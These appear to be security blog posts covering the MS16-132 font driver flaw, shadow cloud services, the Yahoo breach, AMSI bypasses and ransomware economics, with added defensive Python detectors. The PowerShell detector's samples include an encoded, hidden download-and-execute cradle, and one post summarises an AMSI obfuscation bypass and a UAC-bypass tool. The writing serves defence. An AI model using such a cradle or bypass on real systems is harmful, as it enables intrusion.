What Else Happened on Nov 8th? Patch Day.

Yes November 8th was election day in the USA.

In the computer world it was also Microsoft Patch Day (the second Tuesday of the month). So what is important about yet another patch day?

As security pros we must focus on the vulnerabilities that may change our risk analysis.

The SANS Internet Storm Center tells us that one bulletin in particular is the most dangerous one: MS16-132, a remote code execution vulnerability in the Microsoft Graphics Component. https://isc.sans.edu/forums/diary/November+2016+Microsoft+Patch+Day/21689/

(Image: MS16-132 security bulletin)

A remote code execution vulnerability is raw material for dangerous malware: bad actors read the bulletin, work out which bug it fixes, and write code that triggers that bug on machines that are not yet patched.

Why would they bother? To make money, of course. There are programmers who spend every day looking for vulnerabilities they can turn into money at the expense of unsuspecting users.

If a user opens an unknown spam email, or a document attached to a supposed business deal, exploit code for a fresh bug like this typically has no antivirus signature yet, so the first victims get no warning. Which Microsoft software is affected? The bulletin lists:

Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8.1, Windows Server 2012, Windows RT 8.1, Windows 10, Windows Server 2016.

Every one of these operating systems carries the same rating: Critical, Remote Code Execution.

And near the bottom of the bulletin we find the juicy details:

"There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage. The update addresses the vulnerability by correcting how the ATMFD component handles objects in memory."

There are no mitigating factors, only a potential workaround: renaming the atmfd.dll file. ATMFD is the Adobe Type Manager Font Driver; the file's properties describe it as "Windows NT OpenType/Type 1 Font Driver". Keep in mind that the workaround stops the machine from rendering any Type 1 or OpenType/CFF font, so applications that depend on those fonts will not display properly until the real update is in place.

(Image: atmfd.dll file properties)

This is the current culprit. Prepare and test the patches in a staging environment before updating production.
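Since the attack vector is a crafted document or web page carrying a font that atmfd.dll parses, a mail gateway or web proxy can at least flag files that embed Type 1 or OpenType/CFF fonts for closer inspection while the update is being tested. The Python script below is an added example written for this post, not code from the bulletin or from Microsoft. The file signatures it uses are standard (the PostScript Type 1 header, the PFB segment header, the "OTTO" tag of CFF-based OpenType, and the PDF /FontFile and /FontFile3 keys); the sample files are constructed; and it detects only the presence of such a font, not the exploit itself.

```python
"""Mail-gateway style triage for files that carry embedded Type 1 / OpenType fonts,
the objects the ATMFD font driver (atmfd.dll) parses.

Added example, not from the original post. It is a heuristic pre-filter: it flags
files that contain a font ATMFD would parse, it does NOT detect the exploit.
"""
import re

# Type 1 fonts (PFA/PFB) begin with a PostScript header; PFB wraps it in a
# 0x80 0x01 segment header. CFF-based OpenType files start with the 'OTTO' tag.
TYPE1_MARKERS = (b"%!PS-AdobeFont", b"%!FontType1")
PFB_SEGMENT_HEADER = b"\x80\x01"
OPENTYPE_CFF_MAGIC = b"OTTO"

# In PDF, /FontFile embeds a Type 1 program and /FontFile3 a CFF/Type1C/OpenType
# program; /FontFile2 is TrueType, which ATMFD does not handle, so it is skipped.
PDF_ATMFD_FONT_RE = re.compile(rb"/FontFile(?!2)(?:3)?\s*\d+\s+\d+\s+R")


def find_atmfd_fonts(data: bytes) -> list:
    """Return a list of human-readable findings for one file's bytes."""
    findings = []
    if data.startswith(OPENTYPE_CFF_MAGIC):
        findings.append("standalone OpenType/CFF font (OTTO)")
    if data[:2] == PFB_SEGMENT_HEADER and any(m in data[:64] for m in TYPE1_MARKERS):
        findings.append("standalone Type 1 font (PFB)")
    elif any(data.startswith(m) for m in TYPE1_MARKERS):
        findings.append("standalone Type 1 font (PFA)")
    if data.startswith(b"%PDF"):
        n = len(PDF_ATMFD_FONT_RE.findall(data))
        if n:
            findings.append(f"PDF with {n} embedded Type 1/CFF font stream(s)")
    # Fonts can also be dropped into HTML/CSS or other containers; flag a Type 1
    # header anywhere in a file that was not already identified above.
    elif not findings and any(m in data for m in TYPE1_MARKERS):
        findings.append("Type 1 font program embedded in non-font container")
    return findings


def triage(files: dict) -> dict:
    """Map filename -> findings for every file that carries an ATMFD-parsed font."""
    result = {}
    for name, data in files.items():
        findings = find_atmfd_fonts(data)
        if findings:
            result[name] = findings
    return result


# Constructed sample inputs (not real malware): a PDF with only a TrueType font,
# a PDF embedding a CFF font and a Type 1 font, a PFB font file, and a text file.
SAMPLE_FILES = {
    "invoice.pdf": b"%PDF-1.4\n1 0 obj << /Type /Font /Subtype /TrueType /FontDescriptor 2 0 R >>"
                   b"\n2 0 obj << /FontFile2 3 0 R >>\nendobj\n",
    "quote.pdf": b"%PDF-1.5\n4 0 obj << /Type /FontDescriptor /FontFile3 5 0 R >>\nendobj\n"
                 b"6 0 obj << /FontFile 7 0 R >>\nendobj\n",
    "corp.pfb": b"\x80\x01\x10\x00\x00\x00%!PS-AdobeFont-1.0: CorpSans 001.000\n",
    "notes.txt": b"Meeting notes, nothing embedded here.\n",
}

if __name__ == "__main__":
    for name, findings in triage(SAMPLE_FILES).items():
        print(f"{name}: {'; '.join(findings)}")
```

Run against the constructed samples it flags quote.pdf and corp.pfb and leaves the TrueType-only PDF and the text file alone. Treat a hit as "hold for inspection", not "malicious": plenty of legitimate PDFs embed Type 1 fonts, which is exactly why the bug is dangerous.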

Contact Us if you need help in Devising a new Risk Assessment.

 

Hidden Hacks In Network

I often think about where the next attack could come in, and unfortunately it may be where we least expect it.

A Spiceworks blog post has an interesting angle:

How often have cloud services been installed by users without the IT department's knowledge?

(Image: Spiceworks IT survey on cloud services)

The Spiceworks survey found that 78% of IT pros have caught their users installing cloud services without IT's knowledge, anywhere from twice to more than five times.

The cloud applications IT people are most worried about:

  • Cloud Storage (Dropbox, Google Drive, OneDrive) – 35%
  • Webmail (Gmail, Microsoft Exchange Online, Yahoo) – 27%
  • Messaging Services (Google Hangouts, Slack, Yammer) – 9%
  • Finance/Accounting applications (QuickBooks Online, FreshBooks) – 8%
  • Productivity Tools (Office Online, Google Docs) – 4%
  • CRM & SFA (Salesforce, Zoho CRM) – 3%
  • Other – 4%

I would think games are also a big portion, bigger than the 4% for "Other".

As you read down the list of cloud applications, some are easier to access than others. Gmail, Google Hangouts and Google Docs only need a login in a browser. Google's applications are not inherently unsafe; the danger goes up when a document is downloaded from Gmail or Google Drive. Many online cloud apps need no plugins or other downloaded software, but many do, and downloaded plugins are one path of infection.

Accessing personal email on the company network, whether Yahoo, Exchange Online, Gmail or any other email service, is not just a "breach of protocol". The user may unknowingly bring in a stream of spam and phishing emails that try to take over the user's machine.

Say you invested in a program or service that checks company email for viruses and other malware. Personal email read in a browser never passes through that filter, so more viruses and malware get installed, and in a hidden manner.

The same goes for messaging services. It is harder to see how an online accounting program could deliver malware, and the chance is smaller, but it can happen when files with malware in them are downloaded.
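One way to find the shadow cloud use the survey describes is to run the web proxy log against a list of known cloud services and report who is using which unsanctioned ones, and how much they upload. The Python below is an added example, not from the Spiceworks post or from this site; the log format, the domain-to-category map and the sanctioned list are assumptions, and the log lines are constructed.

```python
"""Find unsanctioned cloud services in web proxy logs, grouped by user and by the
categories from the Spiceworks list.

Added example, not from the original post. The proxy log format
('epoch user src_ip METHOD url bytes_out'), the domain-to-category map and the
sanctioned list are assumptions; adapt them to your proxy and your policy.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# Assumed map of hostname suffix -> Spiceworks category. Extend as needed.
CLOUD_CATEGORIES = {
    "dropbox.com": "Cloud Storage", "drive.google.com": "Cloud Storage",
    "onedrive.live.com": "Cloud Storage",
    "mail.google.com": "Webmail", "mail.yahoo.com": "Webmail",
    "outlook.office365.com": "Webmail",
    "hangouts.google.com": "Messaging", "slack.com": "Messaging", "yammer.com": "Messaging",
    "qbo.intuit.com": "Finance/Accounting", "freshbooks.com": "Finance/Accounting",
    "docs.google.com": "Productivity", "office.live.com": "Productivity",
    "salesforce.com": "CRM & SFA", "zoho.com": "CRM & SFA",
}

# Services IT has approved (assumed). Everything else in the map counts as shadow IT.
SANCTIONED = {"outlook.office365.com", "slack.com"}


def categorize(host: str):
    """Return (matched_suffix, category) for a hostname, or None if it is not a known cloud app."""
    parts = host.lower().rstrip(".").split(".")
    # Walk from the full host to shorter suffixes so 'www.dropbox.com' matches 'dropbox.com'.
    for i in range(len(parts) - 1):
        suffix = ".".join(parts[i:])
        if suffix in CLOUD_CATEGORIES:
            return suffix, CLOUD_CATEGORIES[suffix]
    return None


def parse_line(line: str) -> dict:
    """Parse one line of the assumed proxy format into a record."""
    ts, user, src, method, url, bytes_out = line.split()
    return {"ts": int(ts), "user": user, "src": src, "method": method,
            "host": urlsplit(url).hostname or "", "bytes_out": int(bytes_out)}


def shadow_cloud_report(lines) -> dict:
    """Per user: {service: {'category', 'requests', 'bytes_out'}} for known cloud apps
    that are not on the sanctioned list."""
    report = defaultdict(dict)
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        match = categorize(rec["host"])
        if match is None or match[0] in SANCTIONED:
            continue
        suffix, category = match
        entry = report[rec["user"]].setdefault(
            suffix, {"category": category, "requests": 0, "bytes_out": 0})
        entry["requests"] += 1
        entry["bytes_out"] += rec["bytes_out"]
    return dict(report)


# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
1478601600 alice 10.0.1.12 GET https://outlook.office365.com/owa/ 512
1478601605 alice 10.0.1.12 POST https://www.dropbox.com/upload 5242880
1478601610 bob 10.0.1.33 GET https://mail.yahoo.com/ 300
1478601620 bob 10.0.1.33 POST https://mail.yahoo.com/attach 1048576
1478601630 carol 10.0.1.40 GET https://app.slack.com/client 200
1478601640 carol 10.0.1.40 GET https://intranet.example.local/ 100
1478601650 alice 10.0.1.12 POST https://www.dropbox.com/upload 7340032
"""

if __name__ == "__main__":
    for user, services in sorted(shadow_cloud_report(SAMPLE_LOG.splitlines()).items()):
        for svc, info in services.items():
            print(f"{user:6} {info['category']:18} {svc:22} "
                  f"{info['requests']} req {info['bytes_out'] / 1048576:.1f} MiB out")
```

On the constructed log this reports alice uploading 12 MiB to Dropbox and bob using Yahoo webmail, while carol's sanctioned Slack use and the intranet traffic are ignored. The bytes-out column is the one to watch: a personal webmail or storage account that receives large uploads is both a malware entry point and an exfiltration channel.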

This is one reason an IPS (Intrusion Prevention System) is needed.

(Image: IPS threat prevention)

It is very hard to predict all user actions accurately, so another layer of defense at the firewall/network is a good thing.

We know how to defend the network and the perimeter, and the hacker looks for any nook and cranny to get through that defense.

TTP (Tactics, Techniques and Procedures) normally describes the attacker; on our side of the network the matching pieces are technology (firewall and endpoint protection) and procedures, and procedures are where people end up using personal email on a company computer.

More attacks come in where the hacker finds the least defense, like your unknown network devices: an IoT (Internet of Things) system such as a new refrigerator, TV, light bulb, or really any other device on the network (like the cameras used for DDoS in this post) can be hacked.

The hacker has tools like ncat and other innocuous programs that an enterprising person can put to use.

A properly configured IPS can at least provide some defense against these odd attacks. But there is no foolproof defense, just constant surveillance and review, as well as patching and configuration updates as needed.

Not to mention that GRC (Governance, Risk, Compliance) is also important for keeping track of all programs and devices on your network. GRC provides context and priority for attention.

Contact Us to discuss

Using Yahoo Email? Should You Notify Customers that Your Email is Breached?

Everyone following the news should know by now that Yahoo's email service has been hacked. CBS News story: {Yahoo Confirms Massive hack of 500 million accounts, blames "state actor"}

In Yahoo’s terms of services section DISCLAIMER OF WARRANTIES:

19. b.

YAHOO AND ITS SUBSIDIARIES, AFFILIATES, OFFICERS, EMPLOYEES, AGENTS, PARTNERS AND LICENSORS MAKE NO WARRANTY THAT (i) THE YAHOO SERVICES OR SOFTWARE WILL MEET YOUR REQUIREMENTS; (ii) THE YAHOO SERVICES OR SOFTWARE WILL BE UNINTERRUPTED, TIMELY, SECURE OR ERROR-FREE; (iii) THE RESULTS THAT MAY BE OBTAINED FROM THE USE OF THE YAHOO SERVICES OR SOFTWARE WILL BE ACCURATE OR RELIABLE; (iv) THE QUALITY OF ANY PRODUCTS, SERVICES, INFORMATION OR OTHER MATERIAL PURCHASED OR OBTAINED BY YOU THROUGH THE YAHOO SERVICES OR SOFTWARE WILL MEET YOUR EXPECTATIONS; AND (v) ANY ERRORS IN THE SOFTWARE WILL BE CORRECTED.

 

I'm no legal analyst, but this disclaimer of warranty plainly does not promise that they will keep your data secure; item (ii) says so.

Are you using Yahoo Mail as a business email account? Since Yahoo Mail was hacked and your account may well have been one of the 500 million, you have to think about this as if a hacker has your account information:

The hacker could read your email. What can they figure out from your email flow?

Do you use your Yahoo address as the primary account for logging into other services? Wherever you log in with it, that service could now cause problems for you as well.

 

Unfortunately Yahoo also provides the email service for many phone, cable and Internet service companies, which means many home email accounts are now compromised too. For example, this story in The Telegraph mentions 8 million accounts affected in the UK.

A hacker who logs into your Yahoo account can find emails that enable further hacks.

So if you are using Yahoo email, think about all the places it is used as a login name, and consider what happens when the hacker has those as well.

 

How do your risk management assessments hold up when the hackers have valid usernames and passwords for your network? The risk assessment should be updated with that in mind. Does your IT security keep that scenario in mind?

Should you be looking in your network for data being retrieved by accounts that look like normal traffic? Are you reviewing standard traffic for exfiltration of company data?
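To put the exfiltration question into practice: with per-user, per-day records of where each account logged in from and how many bytes it sent out, you can flag an account that logs in from a network it has never used and sends far more than its own baseline, which is what a stolen password tends to look like from the inside. The Python below is an added example, not from the original post; the record format, the 14-day window and the median/MAD thresholds are assumptions, and all the data is constructed.

```python
"""Spot an account that behaves like a compromised one: logins from a network the
user has never used, and outbound volume far above the user's own baseline.

Added example, not from the original post. The record format (user, day, src_ip,
bytes_out), the 14-day baseline window and the thresholds are assumptions.
"""
from collections import defaultdict
from ipaddress import ip_network
from statistics import median

BASELINE_DAYS = 14              # days of history used to build each user's normal profile
MAD_MULTIPLIER = 5.0            # flag when today's volume exceeds median + 5 * MAD
MIN_BASELINE_BYTES = 1_000_000  # skip users with almost no history (avoids zero-spread noise)


def src_network(ip: str) -> str:
    """Collapse a source address to its /24 so DHCP churn inside one office is not 'new'."""
    return str(ip_network(f"{ip}/24", strict=False))


def build_profiles(records):
    """Per user: the set of networks seen and a day -> outbound-bytes total."""
    nets = defaultdict(set)
    daily = defaultdict(lambda: defaultdict(int))
    for r in records:
        nets[r["user"]].add(src_network(r["src_ip"]))
        daily[r["user"]][r["day"]] += r["bytes_out"]
    return nets, daily


def mad(values) -> float:
    """Median absolute deviation: a robust spread estimate for skewed traffic data."""
    m = median(values)
    return median(abs(v - m) for v in values)


def find_suspicious(history, today) -> dict:
    """Return {user: [reasons]} for today's accounts that deviate from their history."""
    nets, daily = build_profiles(history)
    today_nets, today_daily = build_profiles(today)
    alerts = defaultdict(list)
    for user in today_daily:
        for net in sorted(today_nets[user] - nets.get(user, set())):
            alerts[user].append(f"login from new network {net}")
        baseline = list(daily.get(user, {}).values())
        if sum(baseline) < MIN_BASELINE_BYTES:
            continue
        threshold = median(baseline) + MAD_MULTIPLIER * max(mad(baseline), 1)
        volume = sum(today_daily[user].values())
        if volume > threshold:
            alerts[user].append(f"outbound {volume} bytes vs threshold {int(threshold)}")
    return dict(alerts)


def make_records(user, ip, daily_bytes, start_day=0):
    """Build constructed records, one per day, for the samples below."""
    return [{"user": user, "day": start_day + i, "src_ip": ip, "bytes_out": b}
            for i, b in enumerate(daily_bytes)]


# Constructed history (not real data): 14 normal days for two users.
HISTORY = (
    make_records("alice", "10.0.1.12", [2_000_000 + 100_000 * (i % 3) for i in range(BASELINE_DAYS)])
    + make_records("bob", "10.0.1.33", [500_000 + 50_000 * (i % 4) for i in range(BASELINE_DAYS)])
)
# Today: alice is normal; bob logs in from an outside network and pushes 40 MB out.
TODAY = (
    make_records("alice", "10.0.1.15", [2_100_000], start_day=BASELINE_DAYS)
    + make_records("bob", "203.0.113.7", [40_000_000], start_day=BASELINE_DAYS)
)

if __name__ == "__main__":
    for user, reasons in find_suspicious(HISTORY, TODAY).items():
        print(user, "->", "; ".join(reasons))
```

With the constructed data only bob is reported, for both the new network and the volume. Median and MAD are used instead of mean and standard deviation because one big legitimate transfer in the history would otherwise inflate the threshold enough to hide the next one.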

Now that you know your email has been hacked, when do you notify customers? If it were me, I would notify them that my Yahoo account is potentially hacked and that I will be moving to another provider ASAP.

Being a little paranoid is not a bad thing in cybersecurity.

Contact Us to discuss the changing liabilities in your Cybersecurity risk management framework with this Yahoo hack or any potential liabilities that you may not have thought of yet.

Windows Good, Bad, and Ugly Security News

There is some interesting Windows news in case you did not notice:

The Good is that Microsoft has reworked Windows 10 to add AMSI (the Antimalware Scan Interface), which hands script content to the installed antimalware software for inspection before it runs.

The Good:

AMSI was built to counter script-based attacks in Windows 10. The following presentation at Black Hat 2016 gives the details:

(Image: AMSI in Windows 10, Black Hat 2016 presentation)

This means there is now an additional layer of defense on Windows 10 that lets the antivirus stop some scripts from running.

The Bad: an old flaw in Microsoft's browsers (including the latest one, Edge) lets a specially prepared server collect the credentials of your Microsoft account.

(ZDNet story, August 2: Microsoft browser flaw)

This means that if you use a Microsoft browser, you get no warning when such a server steals your credentials.

The Ugly:

The remaining slides in the Black Hat AMSI presentation cover how one would bypass AMSI to attack a computer.

Interesting points from the slides:

Signature bypass by obfuscation: not really hard to bypass AMSI using this.

  1. Remove the help section
  2. Obfuscate function and variable names
  3. Encode parts of the script
  4. Profit

The obfuscation functionality in the ISESteroids module was fast and very effective at the time of writing.


So what started out as a promising defense mechanism is already just another program to bypass. There are also ways to bypass AMSI without showing the user any notification, although those need elevated privileges (an account with administrator permissions).

So now what? AMSI was meant to stop malicious PowerShell and other scripts, and it is already just another hurdle to step over. It is as if Microsoft develops its programs without anyone trying to hack them.
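If AMSI can be bypassed by obfuscation, the next layer is to log what PowerShell actually runs (Script Block Logging, Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and look for the obfuscation itself: encoded commands, runtime base64 decoding, character-code assembly, format-string splicing and random-looking names. The Python scorer below is an added example, not from the Black Hat talk or from this site; the indicators, weights and threshold are assumptions, and the sample script blocks are constructed.

```python
"""Score PowerShell script-block text (the ScriptBlockText of Event ID 4104 once
Script Block Logging is enabled) for the obfuscation tricks in the bypass recipe.

Added example, not from the original post or the Black Hat talk. The indicator
patterns, weights, entropy cut-off and alert threshold are assumptions.
"""
import base64
import math
import re

# (description, regex, weight). Covers encoded parts of a script, dynamic
# invocation, character-code assembly, spliced strings and mangled names.
INDICATORS = [
    ("encoded command switch",
     re.compile(r"-(?:e|ec|en|enc|enco|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 4),
    ("base64 decode at runtime", re.compile(r"FromBase64String", re.I), 3),
    ("dynamic invocation", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 2),
    ("char-code assembly", re.compile(r"\[char\]\s*\(?\s*\d+", re.I), 2),
    ("xor decoding", re.compile(r"-bxor\b", re.I), 2),
    ("format-string splicing", re.compile(r"['\"]\{\d+\}\{\d+\}.*?['\"]\s*-f\s", re.I), 2),
    ("backtick mangling", re.compile(r"\w`\w`\w"), 1),
    ("random-looking names",
     re.compile(r"\$(?=[A-Za-z0-9_]*\d)(?=[A-Za-z0-9_]*[A-Za-z])[A-Za-z0-9_]{12,}"), 1),
]
ALERT_THRESHOLD = 5
ENTROPY_CUTOFF = 5.0   # assumption: ordinary admin scripts sit around 4.0-4.8 bits/char


def decode_encoded_command(text: str) -> str:
    """Return the UTF-16LE payload of an -EncodedCommand argument, or '' if none."""
    m = re.search(r"-(?:e|ec|en|enc|enco|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", text, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def shannon_entropy(text: str) -> float:
    """Bits per character; heavily encoded blobs push this well above normal code."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(text.count(c) / n * math.log2(text.count(c) / n) for c in set(text))


def score_script_block(text: str) -> dict:
    """Score one script block, including its decoded -EncodedCommand payload if any."""
    decoded = decode_encoded_command(text)
    combined = text + "\n" + decoded      # scan the wrapper and the payload together
    hits, score = [], 0
    for desc, rx, weight in INDICATORS:
        if rx.search(combined):
            hits.append(desc)
            score += weight
    if shannon_entropy(text) > ENTROPY_CUTOFF:
        hits.append("high entropy")
        score += 2
    return {"score": score, "hits": hits, "decoded": decoded,
            "alert": score >= ALERT_THRESHOLD}


# Constructed sample script blocks (not real 4104 events): a benign admin command,
# an obfuscated block, and an encoded command wrapping a download cradle.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
SAMPLES = {
    "benign": "Get-Service | Where-Object { $_.Status -eq 'Stopped' } | Select-Object Name",
    "obfuscated": ("$a1b2c3d4e5f6 = [char](73)+[char](69)+[char](88); "
                   "& ('{0}{1}' -f 'Inv','oke-Expression') "
                   "([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('R2V0LVByb2Nlc3M=')))"),
    "encoded": "powershell.exe -nop -w hidden -enc "
               + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode(),
}

if __name__ == "__main__":
    for name, block in SAMPLES.items():
        r = score_script_block(block)
        print(f"{name:10} score={r['score']:2} alert={r['alert']} hits={r['hits']}")
```

The benign command scores zero; the obfuscated block trips four indicators even though the literal string Invoke-Expression never appears in it; and the encoded command is decoded and scanned, which is what catches the download cradle inside it. None of this replaces AMSI, it watches the same input from a place the attacker does not control.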

 

I have mentioned this before, but it is wise to have another entity check your work to see whether you missed anything, or even just to have a different mind look at your creation.

The above instances prove this adage once again.

As far as Microsoft is concerned, we all know how important it is to get the product out to the computing population, and again it is proven that Microsoft tends to err on the side of shipping software rather than waiting and releasing it after more tests.

We think testing should be built into your methods.

Contact Us to discuss how to improve your security  programs.

What is your Budget in Preventing Unforeseen Attacks?

What if your data is worth hundreds of thousands of dollars? Or your liability is in that neighborhood?

Then ransomware hits your data server and you pay $1,000 to save a hundred thousand (or more), assuming of course that you do not have a proper backup in place. Why do you have this problem? Because apparently your IT staff has little direction and is not getting the job done. Picture from our Cyberjoke v1.91:

(Image: tech support Cyberjoke cartoon)

If your data is really worth hundreds of thousands of dollars, then it would be common sense to test your backups periodically, but I guess that is not a "sexy" sell. So sometimes backups do not work as advertised, and paying off the ransomware thieves looks cheaper.

 

There are problems with paying the ransomware people, of course: it is possible that the ransomware "tech support" (ha) cannot help you decrypt your data.

Even if you think your IT staff is competent, there are cases, as Krebs on Security posts, where there were problems and several businesses paid the ransom because it was cheaper.

The hackers are using sophisticated tactics which elude even good IT personnel.

So let's say your IT department is sophisticated: it patches roughly on time, does its backups, maybe does not test enough, but everything is working, so why break anything or do something new?

The hackers are getting better and using more sophisticated tools, like the free software on GitHub provided by professionals across the world:

Bypass-UAC is an interesting program.

It is self-contained and rewrites PowerShell's PEB (Process Environment Block) to give it the appearance of explorer.exe. This has the desired effect because the COM objects involved rely exclusively on the Windows Process Status API (PSAPI), which reads the process PEB.

PowerShell is the scripting shell built into Windows (client and server) that lets a system administrator automate tasks, and PowerShell now runs on Linux as well (per MSDN, the Microsoft Developer Network).

Do you understand what that means? The hackers can build attack code on this nice building block and hide it from the antivirus vendors, your IT people, and fancy firewalls.

Even the best IT teams have problems when the attackers use good tools and programs written for one purpose: to make more money. What is your R&D budget for preventing new, unforeseen attacks? The hackers are spending R&D dollars.

I have written about this before:

The criminals are always improving their lot and operate out of lawless places, which makes them extremely difficult to police.

There is a game afoot (whether you are aware of it or not).

The attackers are pushing and funding efforts to find their equivalent of "gold mines". A high-value server is worth thousands of dollars, especially when ransomware hits it.

The criminal hacker has made thousands and even hundreds of thousands of dollars, so guess what: they want to make more money every year, like the rest of the world. How do they do that? By spending time and resources on building new attacks.

So if the criminal hacker made $1 million, a 10% R&D budget is $100,000. Are you spending $100k on defense?

In fact Business Insider has put together a set of data that comes to $84k per month in revenue for hackers (just over a million dollars a year).

(Image: Trustwave SpiderLabs hacker income data)

This image from Trustwave assumes a 10% exploit-kit success rate and 20,000 users touching the particular site. So in 2015 these hackers potentially made a million dollars.

Here is a review of how a hacker/criminal group is organized (from Kaspersky Lab), and an older post explaining how Trustwave arrived at $90k in monthly income.

(Image: Kaspersky Lab chart of the cybercrime underground)

Survey on IT Defense Budget: I'm trying to find out what people spend on IT defense...

So my question, "What is your budget to prevent unforeseen attacks?", is apt, as I am sure the hackers are spending at least 10%, or $100k per year, on new attacks. The only way we can start to catch up in this IT defense nightmare is to spend some money on shoring up your defenses. If you are an IT person reading this, please feel free to use my data research to convince management to spend "enough" money on defense.

Contact Us to discuss several defense strategies.